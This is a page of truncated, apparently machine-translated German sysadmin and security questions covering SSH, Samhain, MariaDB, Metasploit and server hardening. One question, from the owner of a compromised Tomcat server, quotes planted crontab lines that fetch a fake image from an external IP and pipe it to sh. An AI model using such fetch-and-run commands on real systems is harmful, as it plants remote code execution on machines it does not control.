Kann jemand erklären (oder eine Quelle kennen), die Details zu den Elementen in limits.conf enthält? Die Manpage enthält nicht viele Details. Zum Beispiel heißt es: rtprio maximum realtime priority allowed for non-privileged processes (Linux 2.6.12 and higher) priority the priority to run user process with (negative values boost process priority) …
Ich möchte, dass sich eine Gruppe von Benutzern mithilfe der Authentifizierung mit öffentlichem Schlüssel authentifiziert und andere Benutzer die Kennwortauthentifizierung verwenden. Ist dies in OpenSSH unter Linux möglich? Wenn ja, wie gehe ich vor? Nach dem Durchschauen /etc/ssh/sshd_configscheint es mir beschränkt zu sein, entweder die Schlüsselauthentifizierung zu aktivieren oder PAM …
Ich möchte, dass Samhain beispielsweise eine Datei überwacht /root/somefile. Diese Datei existiert derzeit nicht, aber ich möchte benachrichtigt werden, wenn sie zu irgendeinem Zeitpunkt erstellt wird. Ich füge dies hinzu zu samhainrc: [ReadOnly] file = /root/somefile Dies führt dazu, dass Samhain folgende Protokolleinträge ausgibt: Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT …
Ich habe ungefähr 200 Benutzer. 50 sind in Asien, 50 in Süd- und Osteuropa und rund 100 in Westeuropa. Ich möchte die 50 Benutzer in Asien auf unseren DC in Asien verweisen, und derzeit scheint es, dass sie sich bei unseren europäischen Servern authentifizieren, was zu einer massiven Verzögerung führt. …
Während eines Projektkriegs auf dem Apache Tomcat-Server stellte ich fest, dass der Server kompromittiert wurde. Während des Krieges läuft ein Unbekannter cronso [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh Das heruntergeladene logo.jpghat ein Shell-Skript, …
Geschlossen. Diese Frage ist nicht zum Thema . Derzeit werden keine Antworten akzeptiert. Möchten Sie diese Frage verbessern? Aktualisieren Sie die Frage so dass es beim Thema für Server Fehler. Geschlossen vor 3 Jahren . Was ist der einfachste Weg, um eine Benachrichtigung zu erhalten, wenn bestimmte Ereignisse in Windows-Protokollen …
Ich habe gerade MariaDbauf einem neuen Ubuntu Gnome installiert und anschließend mysql_secure_installation ausgeführt, wo ich ein anständiges Administratorkennwort festgelegt, den anonymen Benutzer entfernt usw. habe. Danach bemerkte ich ein seltsames Verhalten bezüglich des Administratorkennworts: Wenn ich versuche, mich mit dem Befehl von meinem normalen Benutzerkonto aus anzumelden, wirdmysql -u root …
Ein frischer Metasploit auf Kalilinux 2016 (letzter Stall) systemctl start postgresql OK Auf msfconsole msf > db_status [*] postgresql connected to msf Wenn ich die Suche starte msf > search samba [!] Module database cache not built yet, using slow search Also baue ich den Cache neu auf ... msf …
Diese Frage bezieht sich auf den Twitter-Thread von @ SwiftOnSecurity: https://twitter.com/SwiftOnSecurity/status/655208224572882944 Nachdem ich den Thread gelesen habe, verstehe ich immer noch nicht genau, warum Sie die Netzwerkanmeldung für lokale Konten deaktivieren möchten. Also hier ist was ich denke, bitte korrigieren Sie mich, wo ich falsch liege: Angenommen, ich habe einen …
Hintergrund : Die Remote-Protokollaggregation wird als ein Weg zur Verbesserung der Sicherheit angesehen. Im Allgemeinen wird damit das Risiko behoben, dass ein Angreifer, der ein System kompromittiert, Protokolle bearbeiten oder löschen kann, um die forensische Analyse zu vereiteln. Ich habe Sicherheitsoptionen in gängigen Protokolltools untersucht. Aber etwas fühlt sich falsch …
Ich habe einen dedizierten Debian-Server. Ich versuche es zu sichern und eine Möglichkeit, die ich für gut hielt, besteht darin, Dienste herunterzufahren, die ich nicht benötige, wie zum Beispiel FTP. Ich schlage vor, bei der Bereitstellung Folgendes auszuführen: service ntp stop update-rc.d -f ntp remove service vsftpd stop update-rc.d -f …
Mein kostenloses AWS-Konto ist abgelaufen. Ich habe alle S3- und EC2-Ressourcen gelöscht, bin aber auf der Suche, ob ich die verlassen kann Key Pairsund Security Groupsohne dafür bezahlen zu müssen. (Meine Kontoressourcen sehen jetzt so aus: Ressourcen ) In der Dokumentation von Amazon scheint dieses Problem nicht erwähnt zu werden. …
Wir haben bereits ein Wildcard-Zertifikat für *.mycompany.com. Unser Netzwerk verfügt über Hosts, die nur intern erreichbar sind. Alle von ihnen gehören zur internal.mycompany.comSubdomain. Es gibt einen privaten Server mit dem Hostnamen, server.internal.mycompany.comauf dem ich unser Platzhalterzertifikat bereitgestellt habe. Wenn ich den Webserver besuche, wird ein Fehler bei der Nichtübereinstimmung des …
Stellen Sie sich ein Webhosting-Unternehmen vor, mit dem Benutzer Dateien und Git-Repositorys über ssh verwalten können. Das beinhaltet: sichere Kopie (scp) Erstellen, Kopieren, Verschieben / Umbenennen und Löschen von Dateien Ausführen einer engen Teilmenge von Befehlen zur Quellcodeverwaltung und Textbearbeitung (git, vim, nano) Wir möchten das umsetzen und haben folgende …
Ich habe erwähnt, dass / dev / shm und / proc gesichert wurden, und ich habe mich gefragt, wie Sie das machen und woraus es besteht? Ich gehe davon aus, dass dies die Bearbeitung von /etc/sysctl.conf beinhaltet. Wie diese? kernel.exec-shield = 1 kernel.randomize_va_space = 1
We use cookies and other tracking technologies to improve your browsing experience on our website,
to show you personalized content and targeted ads, to analyze our website traffic,
and to understand where our visitors are coming from.
By continuing, you consent to our use of cookies and other tracking technologies and
affirm you're at least 16 years old or have consent from a parent or guardian.